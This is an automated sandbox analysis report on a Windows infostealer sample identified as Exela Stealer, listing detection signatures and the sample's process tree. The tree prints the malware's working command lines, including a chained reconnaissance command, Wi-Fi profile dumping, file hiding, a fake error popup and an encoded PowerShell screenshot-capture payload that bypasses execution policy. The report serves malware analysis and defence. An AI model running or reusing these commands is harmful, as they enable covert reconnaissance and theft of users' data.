Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rename_me_before.exe

Overview

General Information

Sample name:rename_me_before.exe
Analysis ID:1582938
MD5:8b8040d5875e4c41ed5091f92021a16b
SHA1:4ebb7b91e64a7193b61a0e1405847ed13563f7d5
SHA256:7e7597691235f0ff8a8df29ee3e54ea7a69b43b4ef727adf511e7aec749dc68a
Tags:exeuser-Raidr
Infos:

Detection

Python Stealer, Exela Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Exela Stealer
Yara detected Python Stealer
AI detected suspicious sample
Bypasses PowerShell execution policy
Detected generic credential text file
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Gathers network related connection and port information
Modifies existing user documents (likely ransomware behavior)
Modifies the windows firewall
Overwrites the password of the administrator account
Performs a network lookup / discovery via ARP
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: MSHTA Suspicious Execution 01
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses attrib.exe to hide files
Uses cmd line tools excessively to alter registry or file data
Uses ipconfig to lookup or modify the Windows network settings
Uses netsh to modify the Windows network and firewall settings
Uses netstat to query active network connections and open ports
Yara detected Generic Python Stealer
AV process strings found (often used to terminate AV products)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Console CodePage Lookup Via CHCP
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • rename_me_before.exe (PID: 1396 cmdline: "C:\Users\user\Desktop\rename_me_before.exe" MD5: 8B8040D5875E4C41ED5091F92021A16B)
    • rename_me_before.exe (PID: 3512 cmdline: "C:\Users\user\Desktop\rename_me_before.exe" MD5: 8B8040D5875E4C41ED5091F92021A16B)
      • cmd.exe (PID: 4124 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2916 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 3852 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 5664 cmdline: C:\Windows\system32\cmd.exe /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 6700 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7028 cmdline: C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 6096 cmdline: attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • cmd.exe (PID: 1312 cmdline: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • mshta.exe (PID: 2108 cmdline: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
      • cmd.exe (PID: 2080 cmdline: C:\Windows\system32\cmd.exe /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 1460 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 4564 cmdline: C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 2080 cmdline: cmd.exe /c chcp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • chcp.com (PID: 6868 cmdline: chcp MD5: 33395C4732A49065EA72590B14B64F32)
      • cmd.exe (PID: 6096 cmdline: C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 4296 cmdline: cmd.exe /c chcp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • chcp.com (PID: 7200 cmdline: chcp MD5: 33395C4732A49065EA72590B14B64F32)
      • cmd.exe (PID: 3244 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 3120 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 2588 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7176 cmdline: powershell.exe Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7244 cmdline: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • systeminfo.exe (PID: 7328 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
          • WmiPrvSE.exe (PID: 7408 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • HOSTNAME.EXE (PID: 7544 cmdline: hostname MD5: 33AFAA43B84BDEAB12E02F9DBD2B2EE0)
        • WMIC.exe (PID: 7564 cmdline: wmic logicaldisk get caption,description,providername MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • net.exe (PID: 7700 cmdline: net user MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 7716 cmdline: C:\Windows\system32\net1 user MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • query.exe (PID: 7732 cmdline: query user MD5: 29043BC0B0F99EAFF36CAD35CBEE8D45)
          • quser.exe (PID: 7752 cmdline: "C:\Windows\system32\quser.exe" MD5: 480868AEBA9C04CA04D641D5ED29937B)
        • net.exe (PID: 7768 cmdline: net localgroup MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 7780 cmdline: C:\Windows\system32\net1 localgroup MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • net.exe (PID: 7804 cmdline: net localgroup administrators MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 7816 cmdline: C:\Windows\system32\net1 localgroup administrators MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • net.exe (PID: 7836 cmdline: net user guest MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 7852 cmdline: C:\Windows\system32\net1 user guest MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • net.exe (PID: 7868 cmdline: net user administrator MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 7884 cmdline: C:\Windows\system32\net1 user administrator MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • WMIC.exe (PID: 7900 cmdline: wmic startup get caption,command MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • tasklist.exe (PID: 7936 cmdline: tasklist /svc MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
        • ipconfig.exe (PID: 7964 cmdline: ipconfig /all MD5: 62F170FB07FDBB79CEB7147101406EB8)
        • ROUTE.EXE (PID: 7988 cmdline: route print MD5: 3C97E63423E527BA8381E81CBA00B8CD)
        • ARP.EXE (PID: 8004 cmdline: arp -a MD5: 2AF1B2C042B83437A4BE82B19749FA98)
        • NETSTAT.EXE (PID: 8020 cmdline: netstat -ano MD5: 7FDDD6681EA81CE26E64452336F479E6)
        • sc.exe (PID: 8036 cmdline: sc query type= service state= all MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • netsh.exe (PID: 8052 cmdline: netsh firewall show state MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
        • netsh.exe (PID: 8084 cmdline: netsh firewall show config MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 7256 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 7364 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 8164 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7220 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 6316 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 1668 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)
          • csc.exe (PID: 7304 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • cvtres.exe (PID: 7352 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES71B8.tmp" "c:\Users\user\AppData\Local\Temp\iqddoona\CSCE5D39DCC87804C2589D261464B53262.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • cmd.exe (PID: 5576 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7420 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
  • svchost.exe (PID: 7624 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000003.1952943493.000001B1014F9000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ExelaStealerYara detected Exela StealerJoe Security
    00000001.00000003.1952943493.000001B1014F9000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PythonStealerYara detected Python StealerJoe Security
      00000001.00000003.1952943493.000001B1014F9000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000001.00000002.1978432003.000001B101520000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ExelaStealerYara detected Exela StealerJoe Security
          00000001.00000002.1978432003.000001B101520000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PythonStealerYara detected Python StealerJoe Security
            Click to see the 22 entries

            Sigma Signatures

            System Summary

            barindex
